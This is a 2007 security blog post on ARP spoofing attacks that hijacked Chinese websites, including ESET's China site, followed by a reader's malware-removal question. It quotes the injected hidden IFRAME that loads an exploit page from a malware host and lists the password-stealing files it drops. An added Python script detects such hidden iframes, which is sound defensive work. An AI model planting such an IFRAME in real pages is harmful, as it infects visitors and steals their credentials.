Nod to more ARP mayhem?
Thursday October 11, 2007 at 7:35 am CST
Posted by Haowei Ren, Geok Meng Ong
Following our blog post about the significance of web hosting security versus ARP spoofing, our friends at security vendor ESET issued an official statement on October 9th about an ARP attack against their official China website earlier this week. As in other ARP attacks, their web pages were found to have the following malicious IFRAME link injected:
<iframe src=http://fs18.net/down{blocked}/yy.htm width=20 height=0 frameborder=0></iframe>
The “yy.htm” web page, detected generically as Exploit-MS06-014, can download a variety of malware, including:
- vip1.htm (Exploit-BaoFeng.a)
- 0.exe (PWS-QQGame)
- kvmxeis.exe (PWS-OnlineGames.a)
- ii.exe (PWS-QQPass.dll)
- SysWin78.Jmp (PWS-QQGame)
- WinSys88.Sys (PWS-QQGame)
- System6.ins (PWS-QQPass.dll)
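As an added illustration (not part of the original post), here is a small Python check that flags hidden, off-site IFRAMEs of the kind shown above in a page's HTML, the sort of integrity check a site owner or ISP could run against the pages it serves. The host names and the sample page are constructed placeholders.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

def _dim(value):
    """Parse a width/height attribute ('0', '20', '300px'); -1 if absent/unknown."""
    digits = "".join(ch for ch in (value or "") if ch.isdigit())
    return int(digits) if digits else -1

class HiddenIframeFinder(HTMLParser):
    """Collect <iframe> tags with a zero or near-zero dimension, as in the injected link above."""

    def __init__(self, page_host):
        super().__init__()
        self.page_host = page_host.lower()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = {name.lower(): (value or "") for name, value in attrs}
        width, height = _dim(a.get("width")), _dim(a.get("height"))
        if not (0 <= width <= 1 or 0 <= height <= 1):
            return  # visibly sized frame: not the pattern we are hunting
        host = (urlparse(a.get("src", "")).hostname or "").lower()
        self.findings.append({
            "line": self.getpos()[0],
            "src": a.get("src", ""),
            "width": width,
            "height": height,
            "offsite": bool(host) and host != self.page_host,
        })

def find_hidden_iframes(html, page_host):
    """Return hidden iframes found in html; page_host is the site being checked."""
    parser = HiddenIframeFinder(page_host)
    parser.feed(html)
    parser.close()
    return parser.findings

# Constructed sample page: one legitimate frame, one injected hidden frame.
SAMPLE_HTML = """<html><body>
<iframe src="http://www.example.com/news" width="600" height="300"></iframe>
<iframe src=http://bad.example.net/down/yy.htm width=20 height=0 frameborder=0></iframe>
</body></html>"""

if __name__ == "__main__":
    for hit in find_hidden_iframes(SAMPLE_HTML, "www.example.com"):
        print(hit)
```

Run against a copy of each served page (fetched from the real origin, not through the possibly spoofed gateway) and alert on any hit whose "offsite" flag is set.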
In 2007, hijacking of popular websites has become one of the many effective malware propagation methods in China. From W32/Fujacks-style web page infection to ARP spoofing, we have seen many important websites reportedly hijacked to host exploits and malware since the end of 2006.
With relatively good success, this means of malware infection and exploitation has also rapidly evolved from common Microsoft vulnerabilities (Exploit-MS06-014, Exploit-MS07-004, etc.) to application-level vulnerabilities in Yahoo Messenger, the Chinese media player Baofeng, and PPStream.
Network intrusion prevention, web server policies and patch management come to mind as the minimum defenses needed, and should be reviewed by companies that use or offer web services, as well as by ISPs.

January 16th, 2008 at 9:45 am
Hello,
I keep removing the PWS-OnlineGames.a and PWS-Mmorpg.gen and they keep reappearing. McAfee detects and deletes the files but it keeps coming back. I even ran the scan command from safe mode with all the options that McAfee recommends and I still have the virus. What do you recommend I do now to get rid of this nuisance?
Thanks.
Syed